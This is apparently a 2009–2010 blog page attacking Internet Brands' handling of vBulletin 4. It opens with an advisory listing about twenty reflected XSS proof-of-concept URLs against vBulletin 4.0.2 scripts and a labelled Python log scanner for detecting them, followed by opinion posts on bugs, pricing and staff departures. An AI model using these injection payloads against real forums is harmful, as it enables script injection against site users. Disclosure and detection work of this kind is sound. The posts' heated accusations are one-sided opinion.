Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite

Vendor: Internet Brands (NASDAQ: INET)
Product: vBulletin 4 Forum, vBulletin 4 Suite
Version: 4.0.2
Vector of Attack: Cross Site Scripting
Source: Inje3ct0rvBulletin.com

Details:

# Exploit:
http://127.0.0.1/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

Additional vulnerabilities found by vBulletin Forum Members:
http://127.0.0.1/upload/content.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/blog.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
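
The request shapes listed above come in two forms: a payload in a query-string parameter value (the `acuparam=` entries) and a payload carried in the PATH_INFO after the script name (the `script.php/` entries). As an added example (not part of the advisory and not vBulletin's own code), the following Python scans access-log lines for both forms; the log lines, client IPs and timestamps are constructed, and the percent-decoding loop is a general detection hardening, not a claim about how vBulletin decodes input.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format: a payload in a query-string
# value, one in the PATH_INFO after "usercp.php/", a double-encoded variant,
# and two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2010:12:00:01 +0000] "GET /upload/calendar.php?acuparam=%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 5120
10.0.0.5 - - [10/Feb/2010:12:00:02 +0000] "GET /upload/usercp.php/%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4811
10.0.0.7 - - [10/Feb/2010:12:00:03 +0000] "GET /upload/showthread.php?t=42&page=2 HTTP/1.1" 200 9001
10.0.0.9 - - [10/Feb/2010:12:00:04 +0000] "GET /upload/search.php/%253E%2522%253E%253Cscript%253E HTTP/1.1" 200 3000
10.0.0.7 - - [10/Feb/2010:12:00:05 +0000] "GET /upload/forum.php HTTP/1.1" 200 7000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# Markers for the reflected payloads in the advisory: an attribute/tag
# breakout ("><) or an opened <script> tag, in any letter case.
XSS_RE = re.compile(r'(?:"\s*>\s*<|<\s*script\b)', re.IGNORECASE)
SCRIPT_RE = re.compile(r'^(.*?\.php)(/.*)?$')


def fully_decode(s, rounds=3):
    """Percent-decode until stable (bounded) so %253C -> %3C -> < is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def suspicious_parts(target):
    """Yield (where, decoded_text) for each component worth inspecting:
    the PATH_INFO after the .php script name and every query name/value."""
    parts = urlsplit(target)
    m = SCRIPT_RE.match(parts.path)
    if m and m.group(2):
        yield "path_info", fully_decode(m.group(2))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        yield "query_name", fully_decode(name)
        yield "query_value", fully_decode(value)


def scan_access_log(text):
    """Return one finding per request carrying an XSS marker:
    (client_ip, script_path, where, decoded_component)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        path = urlsplit(target).path
        sm = SCRIPT_RE.match(path)
        script = sm.group(1) if sm else path
        for where, decoded in suspicious_parts(target):
            if XSS_RE.search(decoded):
                findings.append((m.group("ip"), script, where, decoded))
                break  # one finding per request is enough for alerting
    return findings


if __name__ == "__main__":
    for ip, script, where, snippet in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {script} [{where}] {snippet}")
```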

We’re Back.. but vBulletin’s Not

Chronos and I both decided after vBulletin 4 went gold, we’d disappear into the shadows to do what we do best: observe. What have we observed during our writing absence? Chaos. Confusion. Backlash. Bugs. Customer Disappointment. Frustration. Disappointment.

As an auditor, I’ve often been asked to audit programs and the scope that’s been undertaken. I’ve also occasionally sat back, as part of my audit scope, to do a complete quality assurance check on software that is intended to be released into production. I find bugs and send them off to QA, but the bugs have also been an indicator to me of how a project is being managed, as well as an indicator of its current project state. It’s shameful that vBulletin 4 was released in such a state. The application itself shows too many signs of software bugs and glitches floating around all over the place. In my opinion, I would never have approved the release of vBulletin 4.

As I sit back and tinker in a closed beta environment on my localhost server, I could not and would not approve vBulletin 4 being utilized on any of my clients’ sites (or my own, for that matter). There is simply far too much risk involved in utilizing software that’s still quite buggy.

My frustrations with Internet Brands are ever growing. As an auditor, I would likely be writing reports like mad and ensuring senior management is held accountable. However, seeing as I’m not Internet Brands’ auditor, my own position is one of a customer. As a customer, I am livid, furious, and insanely upset that Internet Brands would sell me software that is flawed far worse than Windows Vista. More to the point, I’m extremely frustrated that senior management, in particular Bob Brisco and Joe Rosenblum, have not taken responsibility, nor attempted to signal to stakeholders that this fiasco is being addressed and rectified. Instead, they’ve done their marketing campaign and have decided to hide from the wrath of customers.

I quite understand that software bugs are a part of the development of any application. I also understand it never will be perfect, but I’ve often noted in my reports to various software companies that bugs need to be managed and controlled properly. If they ever become a significant issue, they can and will hinder functionality. Furthermore, they will cause backlash and create trust issues that will resonate for years to come.

The point of doing bug fixing is to get rid of those bugs. It’s to ensure the software is 99.99% functional for the most common setups.

Looking at some of the bug reports inside the Project Tools, several bugs I’ve found were documented AFTER the release of vBulletin 4 Gold. Some of these bugs are clearly obvious and are simply shameful, as a 14-year-old would have caught them. It’s appalling.

My question to you, Internet Brands: Who did the quality assurance and wrote the quality assurance plan? It is obvious that QA wasn’t performed properly. It’s clear we’re paying more for vBulletin and getting more bugs and less functional software.

vBulletin 4x – We Want More – ASAP!?

vBulletin 4x – We Want More – ASAP!? Or do we?

Let’s take a look back and do a quick review.

First we get the release of vBulletin 4.0 Gold. This build of vB 4.0.0 is plagued with bugs and known issues, yet it’s still released. Then we get vB 4.0.0 PL1, which is a release patch to fix a newly discovered exploit. This takes us to vB 4.0.1, which is a “maintenance release” that fixed 200+ bugs.
Finally, this brings us to 4.0.2, which was supposed to have been released February 4th, 2010 (now delayed).

The mentality used by IB is amusing, but not at all surprising. Instead of focusing on releasing a solid, stable build, they are merely pumping out versions as quickly as they can, and releasing them prematurely, even when they are clearly not ready to be deployed due to known bugs.

Only now with the delay of the 4.0.2 release have they actually held off releasing it to provide a more “quality” build. Maybe they finally learned their lesson that quality > quantity? We’ll soon find out.

@IB, you disappoint me, yet again. Dare I say, we told you so?
I would highly suggest you take a page out of the old vB team’s book and focus on building a quality product. The old Jelsoft actually valued and knew the importance of releasing a solid build instead of just releasing as many bug-filled versions as they could.

vBulletin 4 – Revolutionary or Disturbingly Flawed?

Twas the day before Christmas
and all through the net
vBulletin admins banging their heads
Installations have started for vBulletin 4
In hopes that it will succeed, once and for all

Once installed, the admin sighed in relief
and began to tinker, then much to his disbelief
not one, but hundreds of bugs did appear
and it’s wrecked his Christmas cheer.

Then with a fury he curses at once
he runs for support just to fix the matter
To his surprise he’s not alone
for this bug was found long, long ago.

The poem’s a bit overly dramatic, but it’s rather fitting based on the struggles Chronos and I have seen this week. It’s been four days since vBulletin 4 came out, and it appears it has been a miserable four days. Bugs galore, customers crying foul, requirements not met (which is the biggest concern, as any excellent systems developer would know you must achieve a good percentage of them). And then there’s the occasional cheer and celebration saying vBulletin 4 is rather golden.

vBulletin is a marvelous product. vBulletin 4, however, leaves a bitter taste in my mouth. There are far too many misuse cases that were not accounted for, thus breaking the entire information system.

I will be the first to say that we as customers should have held Internet Brands accountable. Clearly Internet Brands dropped the ball, and now we’re dealing with an incomplete, half-baked, second rate, forum and CMS.

I’m going to pose the question to everyone out there: What do you think of vBulletin 4? The blunt, brutal, hard truth. Is it worth the price, time, and energy in buying, installing, and/or upgrading to? What would you tell future investors? Or what would you tell future customers?

Comment away.

Internet Brand’s Investment Nightmare: vBulletin

Internet Brands operates communities for anyone to speak. But more importantly, are they truly listening to their customers and what they are saying?
When dealing with any investment, there is risk. Does Internet Brands understand how much risk they’ve undertaken? Is Internet Brands managing those risks well?

I’ve often wondered why some of the senior development team for vBulletin suddenly left without any advance warning. In one short month, Kier Darby, Mike Sullivan, and Scott Macvicar all left Internet Brands. That one month represented a significant loss of talent, senior management, and senior development of vBulletin. These three represent the brains of vBulletin. They represent the integrity of vBulletin. They represent the key development and leadership of an industry icon. They understood customers’ requirements. They understood the customer. Last but not least, this trio understood vBulletin.

These questions have been racing in my mind. Why did they leave? For what possible reasons could they have left? Was it because Internet Brands (Nasdaq: INET) acquired them? Was it because of management? Was it because they no longer liked working at Jelsoft and Internet Brands? Was it because they became merely a cog in this giant machine? Or maybe, rather than job enlargement and enrichment, they experienced job reduction and dissatisfaction?

Finally, that silence has been broken. It appears what we’ve suspected all along happened. I hoped this wasn’t the case, however, my own nightmare, suspicions, and fears have been confirmed.

Internet Brands meddled where they should not have. They’ve roasted, and killed the goose that laid the golden eggs. It is the classic management case study in which employees leave because of management, not because of the company.


Ray Morgan Resigns!

Breaking News! Ray Morgan resigns as vBulletin General Manager.

Sincere thanks to the vBulletin community!

Greetings all,

As some of you know, my wife and I own property in Central America and have worked for the last few years toward building a home there. We are now in a position where we can begin construction, and that will require a lot of time on site and a great deal of travel.

Since my role in vBulletin can’t reasonably be filled from 3,000 miles away, the time has come for me to transition various responsibilities to my teammates. I will be with Team vB through this Friday, December 11.

These changes will not directly affect vBulletin customers. The rest of the team remains intact, and the most important things are not changing:

Kevin Sours will continue to run vBulletin’s large Engineering group, with backup from Joe Rosenblum, Internet Brands’s CTO.

Don Kuramura will continue to be responsible for Product Management, strategy, and business development.

Steve Machol will continue managing the Support team, with backup from Jennifer Rundell, Internet Brands’s VP of Content.

The path to building 4.0 out the door has been incredibly exciting, and all the more so to have done it alongside such a smart and dedicated team. (Each of them has a standing invitation to visit Lake Arenal!)

vBulletin is in very capable hands. The imminent release of 4.0 is just the beginning of some very exciting things ahead. The Internet evolves quickly, so in addition to new things like the Content Publishing Suite, Team vB are working on even bigger expansions, like products and services for big-board customers, vB for mobile, and more.

Again, a heartfelt thank you to the vBulletin community for all of your support.

Onward!

Our thoughts to come later.

The Real Faces Behind Internet Brands

Highway Robbery

I was tutoring this weekend and I helped an 11th grade high school student with US History. He pointed out to me that history is useless, but I retorted that if we never learn from history, history has a tendency to repeat itself. That gave me reason to pause as I thought how that very logic applies to our scenario. Internet Brands did this once to us; who’s to say they won’t do it again?

Let’s face the truth. I got my credit card bill last week, and it’s simply highway robbery. I cringed at the fact I had to pay just to do an upgrade. Sure, $130.00 doesn’t seem much, but when you combine it with the fact that our license was supposed to be worth $160.00 (or $180.00 for others), we’re still paying more than $235.00 for a brand new license! What Internet Brands is making us pay is simply highway robbery. I don’t know how else to put it.

I don’t see ANY reason at all to justify existing license holders paying more. Essentially we’re being told to just pony up money for a brand new license. Forget what Internet Brands has told you; it’s merely a ploy, a cover. It’s purely marketing. Rip off all the marketing, and you’ll see that we’re paying for a brand new license.

As existing Legacy vBulletin license holders, we’re treated as second rate citizens. We’re not important to them. Our wallets are more important to them. Who’s to say this won’t happen again when vBulletin 5 arrives on the horizon?

We’re stuck holding a useless, absolutely pointless vBulletin 3 license. After our license expires, per se, no more updates. No more security patches. Once vBulletin 4 goes into full swing, vBulletin 3 citizens are treated as the scorn of the earth. Internet Brands manipulated us using fear tactics so that we’d buy licenses.

I really sympathize with those who bought vBulletin licenses really late in the game, before vBulletin 4 was announced. Anyone who bought a license merely hours or days before vBulletin 4 got announced feels the real wrath. They bought a license only to have it invalidated and ripped from their hands minutes later.

Yet when they protest that they’ve been scammed, they’re told to upgrade to the latest vBulletin 4 License by paying even more? Any more protests, and you have threads closed. Has anyone checked out Pre-Sales recently? There are several threads in which customers point out that they don’t treat customers well.

Has anyone at Internet Brands done the math? We’re paying MORE for upgrading to a vBulletin 4 license than brand new vBulletin 4 license holders. Where’s the justice? Where’s the respect? More importantly, where’s the loyalty to your existing customer base that made vBulletin so successful? If they’re treating customers like this, as a shareholder, stakeholder or investor I’d wonder how Internet Brands may very well treat me in the future.

Let’s face it. vBulletin 3 license holders have been screwed over. If history has anything to say, it’s that it’s going to happen again.

A Look Back: Then and Now

It was in May 2009 when the world first became aware of the infamous vBulletin 4 leak. Forums and blogs all over the Internet had screenshots posted for the upcoming plans for vBulletin 4. This extensive thread contained future plans in terms of pricing, licensing changes, changes to support, the process of beta testing, and so on.
Let’s take a look at some of the proposed changes and what ended up happening.

Pricing:
The pricing changes that were brought up in the thread ended up happening.
vB4.0 Publishing Suite – New license: $285, Upgrade: $250
vB4.0 Forum Classic – New License: $195, Upgrade: “Free”.

Note that I am intentionally leaving out the discounted “pre-order” prices, since there was no mention of these in the leaked thread.

Also keep in mind, the pricing above is for vB 4x. Upgrading to vB 5x will be an additional fee (notice a pattern here?) which has not yet been determined.

Support:
The change to support – These changes also ended up happening.
Although customers get access through the forums, the Forum Classic customers only get access through the support system for 30 days and they will be forced to pay extra if they need additional support through a ticket.

One major reason people chose vBulletin in the past was the affordable prices and the excellent support that was offered through tickets and the forum. Yet once again, IB is taking something that worked well and engaging in price gouging, charging extra for the software itself and for support tickets, because they know they can.

Beta Testing:
In the past, when the times were good and we had the original development team, open beta testing was something of the norm. This was important because it gave members a chance to try out the software so they could get a head start on getting their communities ready. It was also important because members of the modding and skinning community were able to play with the software to prepare their products for the new version of vBulletin. All of this changed, however, with IB and the new development team. Beta access to vB4 was only given to a select handful of customers. Later, after much controversy, they decided to give members who pre-ordered it a chance to try the beta as well, but only because they were forced to by all the negative attention, and this was a feeble attempt to “give back” to the community.

Impact:
News of this leak caused an upheaval. Most people were furious to hear about some of these planned changes. When the topic was brought up on the forums, it resulted in nothing but closed threads and IB simply ignored the subject, telling us to wait for “official word”.

In the leaked screenshots, Steve clearly states that if the situation is not handled correctly, it could cause a “negative impact” and he pretty much nailed it – yet even with this, they failed to transition correctly and failed to handle the situation accordingly. The last line regarding the customer issue is what makes this whole situation ironic: “If we want loyalty from our customers, then we should be loyal to them in return”.

IB had a chance to try and reassure their customers but failed to do so. People grew more and more frustrated, and IB’s turning their heads in the opposite direction, continually ignoring the subject, only added to this frustration. IB should have taken what they learned from the original leak to make changes, improve, and do everything in their power to reassure the community, but they failed to do so.

Internet Brands, Lying Scumbags SAY WHAT!?!?!?!?!!! – !#@$%^&

In every story, there are two sides. There was a lot of criticism, with people feeling that Internet Brands was not given a fair chance to comment in The Register’s recent article on vBulletin. Today, Internet Brands made their comment to The Register in a new article released today, and after reading it, I will have to say Internet Brands has hit a new low. Oh, a new low indeed.

Earlier in the week, former core Jelsoft developer Scott Macvicar wrote on his Twitter “So sad to see the company I helped build up screw customers over. Glad I bailed when I did, funemployment rocks” in a comment on the flood of tweets about the very first Register article on vBulletin.

vBulletin was definitely Scott’s baby. We have known Scott for 7-8 years now, and vBulletin was his pride and joy. I can honestly say I’ve never known a person like Scott, who loved what he did. Let’s not forget he has had our admiration and respect for that exact same time period and has been with vBulletin since the beginning.

But this is a new low, and a new low indeed. Legal counsel for Internet Brands, Patrick Stack, dismissed Scott’s comment earlier today in The Register’s new article, saying that it is “not too worrisome” and that it came from a “disgruntled former employee.”

EXCUSE ME!?!? What are you smoking Mr. Stack!? Have you no shame? YOU DID NOT JUST CALL SCOTT MACVICAR A DISGRUNTLED EMPLOYEE.

In my eyes, Mr. Stack has led Internet Brands onto a powder keg. It will backfire if Internet Brands is not careful. If there’s ever a reason to pick a bone with Internet Brands, this would be one reason. It’s rude to call Scott disgruntled. It’s disrespectful. It’s uncalled for, for a number of reasons.

Internet Brands just took a swipe at one of the most respected trios of management, leaders, and developers in the industry. This same trio also has the respect of the competition, including Invision Power Board’s lead developer Matt Mecham. Let’s also not forget Scott’s extensive resume too. Not only was he a vBulletin developer, he’s the lead developer of the SQLite3 Extension and the ImageMagick PHP wrapper. Plus he’s a former mentor for the Google Summer of Code program.

The man’s a legend, in short, and Internet Brands has the audacity to take a swipe at this guy? Scott knows what he’s doing, and he’s done it extremely well for the last several years. I can’t say the same for you, Internet Brands. Talk about the pot calling the kettle black. Look in the mirror sometime, Internet Brands, and it might surprise you that you’re describing everything about yourself. If anything, Scott’s not a disgruntled employee; rather, he’s a smart and brilliant employee who has a far more comprehensive understanding of a customer than you currently have.

I hope investors are listening to this side of the fence. Internet Brands just lost a ton of respect in my eyes. It was bad enough they weren’t listening to us, but to backstab one of their former employees in an attempt to save face with the public? Wow. That’s just low.

If there’s ever a reason to leave Internet Brands as an employee, we most certainly found that reason. It’s the classic management case study in which employees don’t divorce the company, but rather they divorce management. Many of us wondered why Scott, Mike, and Kier left vBulletin, and I think we have a slightly more clear picture today.

Scott, we salute you. Let’s hope they don’t take a swipe at Kier or Mike next.

Some parting words from Scott in response to Patrick’s outlandish comments:

Disgruntled? I wouldn’t say I’m a disgruntled employee, I left on reasonable terms with the company and was answering questions for them just a few weeks ago. The fact that they’re simply ignoring customers is just shocking and it’s what troubles me the most.


Repost: The Register Writes About vBulletin Fiasco

News has come in that a well known on-line Internet “News Paper” called The Register has written a damning article which highlights exactly what’s been going on over at vBulletin by Internet Brands. This is something Internet Brands will not be happy to see happen, especially coming at a time when they’re trying to avoid any bad publicity while the pre-sale of their (not yet out) vBulletin 4 Suite is still on-going until the end of October 2009.

The article itself, which was written by “Cade Metz in San Francisco” on behalf of The Register and quite amusingly titled “Forum king vBulletin muzzles paid-up protesters”, highlights well most of the key points bothering vBulletin customers the most right now. “The Register” is hugely popular and read by millions of Internet users worldwide, meaning this is bad news indeed for Internet Brands at a very critical time in their sales.

To make matters much worse for Internet Brands, other Internet users, after reading the article, are using Social Networking sites like “Twitter and Digg” to highlight it much further to the World Wide Web masses, so that people can get easy access to read this very interesting article posted by “The Register” about Internet Brands and the troubled sale of vBulletin 4.

Quite an interesting read indeed, I’m sure you’ll agree. To which you can leave your comments below!